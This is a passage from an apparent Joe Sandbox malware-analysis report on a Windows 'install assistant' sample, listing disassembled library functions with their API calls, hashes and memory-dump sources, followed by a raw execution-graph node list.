                              • Instruction Fuzzy Hash: E6815A31D0125DDFCF25DFA8D990ADEB7B4AF19318F10409AE816B7790DB30AA19CB61
                              Function 6C0F28E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                              Download Yara Rule
                              APIs
                              • ___std_exception_destroy.LIBVCRUNTIME ref: 6C0F2A76
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ___std_exception_destroy
                              • String ID: Jbx$Jbx
                              • API String ID: 4194217158-1161259238
                              • Opcode ID: 12219a74225ed660d9303e33e152864f754509327e6b4924b226299691c70e0a
                              • Instruction ID: 9c2e0189bd0c27eef9c4543792e214d457e93661ea5947be8cd94a7e5dbc7d70
                              • Opcode Fuzzy Hash: 12219a74225ed660d9303e33e152864f754509327e6b4924b226299691c70e0a
                              • Instruction Fuzzy Hash: 5D5154B19002448FCB14CF58D884A9EBBF5EF89314F10846DEC699B741D335E996CF92
                              Function 6C27FF9C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: <dJ$Q
                              • API String ID: 3519838083-2252229148
                              • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                              • Instruction ID: 7f6b49870417e8d6afc61aa154971f8f0855d42c98f05fe45a0f9c5628cda669
                              • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                              • Instruction Fuzzy Hash: 75518E7190624EEFCF00DF98C8808EEB7B1BF49318F54851EF915ABA90DB319949DB11
                              Function 6C27B9B9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $D^J
                              • API String ID: 3519838083-3977321784
                              • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                              • Instruction ID: 3dfb4dc2b62de7dc6c6c8008e79ad0200877f1e876562691717549c35a1c8119
                              • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                              • Instruction Fuzzy Hash: 6D419961A0459E6EDF32AF29C4D4BEDBBA19F07308F149158EC9247E85DB74498BC3B0
                              Function 6C23CEFE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C2446D6), ref: 6C23D01B
                              • __dosmaperr.LIBCMT ref: 6C23D022
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr
                              • String ID: 8Q
                              • API String ID: 1659562826-4022487301
                              • Opcode ID: 0f09e370f320931353a26e715848f330b254b6d873e7847e51ddadbbe8727cbc
                              • Instruction ID: 19e8619c4de10bf210640bf5049d921b839eafd2385fdea8cd44af489d0d1544
                              • Opcode Fuzzy Hash: 0f09e370f320931353a26e715848f330b254b6d873e7847e51ddadbbe8727cbc
                              • Instruction Fuzzy Hash: 4041A8F16242BDAFCB11AF28CC80BA97FA5EB46B08F14535AFC8887605D7358D118790
                              Function 6C29512C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: X&L$p|J
                              • API String ID: 3519838083-2944591232
                              • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                              • Instruction ID: 606c6cea63c4fbad7ac42b3c3c76b58ade994d409e2c31710ff5ba64dcedc2e6
                              • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                              • Instruction Fuzzy Hash: 52312E31F9510EDBD7009B5EDD01FAE7771EB1132BF500336ED10A6EA0CB608596CA52
                              Function 6C294C24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 0|J$`)L
                              • API String ID: 3519838083-117937767
                              • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction ID: c7286136e39dd2fdd2c771df797196ba94cabde7e1423235c28de8db879ae20f
                              • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction Fuzzy Hash: D941E27960174AEFDB119F61C490BEBBBE2FF45209F00442EE86A97760CB316915CBA1
                              Function 6C297CB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __aulldiv
                              • String ID: 3333
                              • API String ID: 3732870572-2924271548
                              • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                              • Instruction ID: 60dda91d7160cd0006ddd9a90222c64710df45bfc8fc26b39194919b294d001c
                              • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                              • Instruction Fuzzy Hash: 9B21BAB494070C6FE734CFAA8880B5BFAFDEB44B14F10891EB586D3B40DB70A9448765
                              Function 6C2385A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _free
                              • String ID: dU2l$hU2l
                              • API String ID: 269201875-3009053071
                              • Opcode ID: b580c06e976e98bddd8c3fa3fbd88729562a74f251c2a5fd038498b23bf7ae67
                              • Instruction ID: 50c771897059321980b8bf08bd2e1f35bc8292f96e3387a10e1337efa9b0729f
                              • Opcode Fuzzy Hash: b580c06e976e98bddd8c3fa3fbd88729562a74f251c2a5fd038498b23bf7ae67
                              • Instruction Fuzzy Hash: 1511D6B520431A8BE7108F29D480B8277E4EB05799B20542FE99DCBB80EB71E5848F90
                              Function 6C290906 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$LuJ
                              • API String ID: 3519838083-205571748
                              • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction ID: 8a2e21f9cd67e159d4b3cc905f32f6fe0998bf954b07a4af76a3fb68d2e73423
                              • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction Fuzzy Hash: 890184B1E0138EDAEB10DFDA84809AEF7B4FF59704F40842EE969E3A40C3745945CB59
                              Function 6C26C0AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$xMJ
                              • API String ID: 3519838083-951924499
                              • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                              • Instruction ID: 50b77cdd4ea1c0534f859a9b4b11f8f86b006846f9fdf47a3ab79e9dd5289b5b
                              • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                              • Instruction Fuzzy Hash: F5115E71A0024ADBCF00EF9AC49059EB7B4FF18748B50C46EE869E7B00D7349A45CB65
                              Function 6C23DD28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44memoryCOMMON
                              Download Yara Rule
                              APIs
                              • _free.LIBCMT ref: 6C23DD49
                              • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C23A63A,?,00000004,?,4B42FCB6,?,?,6C22F78C,4B42FCB6,?), ref: 6C23DD85
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: AllocHeap_free
                              • String ID: 8Q
                              • API String ID: 1080816511-4022487301
                              • Opcode ID: ffa6cd5f1a806bf522ce29122d99795d7a55cdf369fc66bd93a3a9d079798cc1
                              • Instruction ID: da149e7a981cd19c7c921d0f7e27185a869bd2290562d3af2f9ea193954e8f77
                              • Opcode Fuzzy Hash: ffa6cd5f1a806bf522ce29122d99795d7a55cdf369fc66bd93a3a9d079798cc1
                              • Instruction Fuzzy Hash: 17F0C8BB62123E66DB231A269C44F9B37698FC3675F116115FD1C97E90DF20D404C1E0
                              Function 6C28F741 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C28F746
                                • Part of subcall function 6C28F7BF: __EH_prolog.LIBCMT ref: 6C28F7C4
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: uB)l$sJ
                              • API String ID: 3519838083-2241131741
                              • Opcode ID: 479f86800d12ad63e1b8ae242903cd26d6f9166e8cc8054c33d6365a60c3e9bf
                              • Instruction ID: ced32d994909ce99453b897ace2d4104af8bd518fcd57e3d568fcfe9aabb8224
                              • Opcode Fuzzy Hash: 479f86800d12ad63e1b8ae242903cd26d6f9166e8cc8054c33d6365a60c3e9bf
                              • Instruction Fuzzy Hash: C801A271A0000CEBDF01BBA4C841AEEBB65EF85718F00401AE94192690CF74496ACB91
                              Function 6C293431 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prologctype
                              • String ID: |zJ
                              • API String ID: 3037903784-3782439380
                              • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                              • Instruction ID: f4b2d7323770cf5c80bb8c690d72e5c4f7eec16073d40455f1577e1cdf97ecbc
                              • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                              • Instruction Fuzzy Hash: 81E02B326051199BE705CF49C800BDEF3A4FF54B25F11401FE81AA3A40CBF0A810C782
                              Function 6C28A143 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prologctype
                              • String ID: <oJ
                              • API String ID: 3037903784-2791053824
                              • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                              • Instruction ID: 92e84e91ac7e84eea3742eb64862ba240868bf3387235784645e5754b5c7689e
                              • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                              • Instruction Fuzzy Hash: 3DE0ED32A12119DBEB049F0CC820BDEF7A4EF41728F11011EE821A3BC1CFB1A8148680
                              Function 6C226AAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              • AcquireSRWLockExclusive.KERNEL32(6C32466C,?,?,652EF5AA,6C0F22D8,6C32430C), ref: 6C226AB9
                              • ReleaseSRWLockExclusive.KERNEL32(6C32466C), ref: 6C226AF3
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ExclusiveLock$AcquireRelease
                              • String ID: lF2l
                              • API String ID: 17069307-2379685847
                              • Opcode ID: e73f90c6533bc8638a0d910587183b7bdb458e6d9cc9952af7f3fd62ffa9874d
                              • Instruction ID: 1640a4b96a9eb103f99633aad0ed7342cb3e80ccb79ed6b9074db6fde1d390f1
                              • Opcode Fuzzy Hash: e73f90c6533bc8638a0d910587183b7bdb458e6d9cc9952af7f3fd62ffa9874d
                              • Instruction Fuzzy Hash: 2AF0A736640505DFCB105F15D484E66B7B9EB47735F14422DED5583AD0D7381852CA61
                              Function 6C2BF4AB Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: @ K$DJ$T)K$X/K
                              • API String ID: 0-3815299647
                              • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                              • Instruction ID: 7f74a2b664e077448147c4ef1cfb9b72313e5198c322d7b8c59757b78dcf859e
                              • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                              • Instruction Fuzzy Hash: 0B91157C60430E9BCB00DFA4C850BEF73A2AF4538DF54849ADC656BB81DB35A85AC751
                              Function 6C2B4E19 Relevance: 5.2, Strings: 4, Instructions: 161COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: D)K$H)K$P)K$T)K
                              • API String ID: 0-2262112463
                              • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                              • Instruction ID: dfe7faed51220c72d1681754efd18784fe7d950f5ba192e50aa6fc4b15bb92c4
                              • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                              • Instruction Fuzzy Hash: 2A51CF7090420EABCF01DF94D880AEFB7B1AF0535CF54452AFC15B7A80DB75A969CBA1

                              Execution Graph

                              Execution Coverage:4%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0.4%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:31
                              execution_graph 73238 6ea42c 73239 6ea449 73238->73239 73240 6ea435 fputs 73238->73240 73397 6e545d 73239->73397 73396 6b1fa0 fputc 73240->73396 73247 6ea4c9 73466 6b1e40 free 73247->73466 73249 6ea4d8 73250 6ea4ee 73249->73250 73467 6ec7d7 73249->73467 73252 6ea50e 73250->73252 73475 6e57fb 73250->73475 73485 6ec73e 73252->73485 73257 6eac17 73674 6e2db9 free ctype 73257->73674 73261 6eac23 73263 6eac3a 73261->73263 73265 6eac35 73261->73265 73262 6ea54d 73508 6b2fec 73262->73508 73676 6eb96d _CxxThrowException 73263->73676 73675 6eb988 33 API calls __aulldiv 73265->73675 73268 6eac42 73677 6b1e40 free 73268->73677 73271 6eac4d 73678 6d3247 73271->73678 73273 6ea586 73514 6ead06 73273->73514 73278 6eac7d 73685 6b11c2 free __EH_prolog ctype 73278->73685 73282 6eac89 73686 6ebe0c free __EH_prolog ctype 73282->73686 73286 6eac98 73687 6e2db9 free ctype 73286->73687 73287 6b2e04 2 API calls 73289 6ea636 73287->73289 73532 6d4345 73289->73532 73290 6eaca4 73293 6ea676 73538 6d2096 73293->73538 73297 6ea66f 73634 6eb96d _CxxThrowException 73297->73634 73299 6ea6e2 73300 6ec7d7 ctype 6 API calls 73300->73299 73376 6eaae5 73673 6e2db9 free ctype 73376->73673 73396->73239 73398 6e5466 73397->73398 73399 6e5473 73397->73399 73688 6b275e malloc _CxxThrowException free ctype 73398->73688 73401 6b2e04 73399->73401 73402 6b1e0c ctype 2 API calls 73401->73402 73403 6b2e11 73402->73403 73404 6d1858 73403->73404 73405 6d1862 __EH_prolog 73404->73405 73689 6d021a 73405->73689 73410 6d18b9 73703 6d1aa5 free __EH_prolog ctype 73410->73703 73412 6d1935 73714 6d1aa5 free __EH_prolog ctype 73412->73714 73413 6d18c7 73704 6e2db9 free ctype 73413->73704 73416 6d1944 73438 6d1966 73416->73438 73715 6d1d73 5 API calls __EH_prolog 73416->73715 73418 6d18d3 73418->73247 73421 6d1958 _CxxThrowException 73421->73438 73423 6d19be 73722 6df1f1 malloc _CxxThrowException free _CxxThrowException 73423->73722 73424 6d18db 73424->73412 73705 6d0144 malloc _CxxThrowException free _CxxThrowException 73424->73705 73706 6f04d2 73424->73706 73712 6b1524 malloc _CxxThrowException __EH_prolog ctype 73424->73712 73713 6b1e40 free 73424->73713 73426 6b2e04 2 API calls 73426->73438 73428 6d19d6 73723 6d7ebb 73428->73723 73432 6f04d2 5 API calls 73432->73438 73435 6d7ebb free 73437 6d19f7 73435->73437 73439 6c12d4 4 API calls 73437->73439 73438->73423 73438->73426 73438->73432 73716 6b631f 73438->73716 73720 6b1524 malloc _CxxThrowException __EH_prolog ctype 73438->73720 73721 6b1e40 free 73438->73721 73448 6d19ff 73439->73448 73441 6d1a4f 73736 6b1e40 free 73441->73736 73443 6d1a57 73737 6e2db9 free ctype 73443->73737 73445 6b1524 malloc _CxxThrowException 73445->73448 73446 6d1a64 73738 6e2db9 free ctype 73446->73738 73448->73441 73448->73445 73450 6d1a83 73448->73450 73735 6b42e3 CharUpperW 73448->73735 73739 6d1d73 5 API calls __EH_prolog 73450->73739 73452 6d1a97 _CxxThrowException 73453 6d1aa5 __EH_prolog 73452->73453 73740 6b1e40 free 73453->73740 73455 6d1ac8 73741 6d02e8 free ctype 73455->73741 73457 6d1ad1 73742 6d1eab free __EH_prolog ctype 73457->73742 73459 6d1add 73743 6b1e40 free 73459->73743 73461 6d1ae5 73744 6b1e40 free 73461->73744 73463 6d1aed 73745 6e2db9 free ctype 73463->73745 73465 6d1afa 73465->73247 73466->73249 73468 6ec7ea 73467->73468 73469 6ec849 73467->73469 73470 6ec7fe fputs 73468->73470 74230 6b25cb malloc _CxxThrowException free _CxxThrowException ctype 73468->74230 73471 6ec85a 73469->73471 74231 6b1f91 fflush 73469->74231 73470->73469 73471->73250 73476 6e5805 __EH_prolog 73475->73476 73477 6e5847 73476->73477 74232 6b26dd 73476->74232 73477->73252 73483 6e583f 74252 6b1e40 free 73483->74252 73486 6ec748 __EH_prolog 73485->73486 73487 6ec7d7 ctype 6 API calls 73486->73487 73488 6ec75d 73487->73488 74291 6b1e40 free 73488->74291 73490 6ec768 74292 6d2c0b 73490->74292 73494 6ec77d 74298 6b1e40 free 73494->74298 73496 6ec785 74299 6b1e40 free 73496->74299 73498 6ec78d 74300 6b1e40 free 73498->74300 73500 6ec795 73501 6d2c0b ctype free 73500->73501 73502 6ea51d 73501->73502 73502->73376 73503 6b1e0c 73502->73503 73504 6b1e1c malloc 73503->73504 73505 6b1e15 73503->73505 73506 6b1e2a _CxxThrowException 73504->73506 73507 6b1e3e 73504->73507 73505->73504 73506->73507 73507->73262 73632 6eb0fa malloc _CxxThrowException __EH_prolog 73507->73632 73509 6b2ffc 73508->73509 73510 6b2ff8 73508->73510 73509->73510 73511 6b1e0c ctype 2 API calls 73509->73511 73510->73273 73512 6b3010 73511->73512 74303 6b1e40 free 73512->74303 74304 6ead29 73514->74304 73517 6ebf3e 73518 6b2fec 3 API calls 73517->73518 73519 6ebf85 73518->73519 73520 6b2fec 3 API calls 73519->73520 73521 6ea5ee 73520->73521 73522 6c3a29 73521->73522 73523 6c3a3b 73522->73523 73524 6c3a37 73522->73524 74310 6c3bd9 free ctype 73523->74310 73524->73287 73526 6c3a42 73527 6c3a6f 73526->73527 73528 6c3a67 73526->73528 73529 6c3a52 _CxxThrowException 73526->73529 73527->73524 74312 6c3b76 malloc _CxxThrowException __EH_prolog ctype 73527->74312 74311 6f0551 malloc _CxxThrowException free memcpy ctype 73528->74311 73529->73528 73533 6d434f __EH_prolog 73532->73533 73534 6b2e04 2 API calls 73533->73534 73535 6d436d 73534->73535 73536 6b2e04 2 API calls 73535->73536 73537 6d4379 73536->73537 73537->73293 73633 6d375c 22 API calls 2 library calls 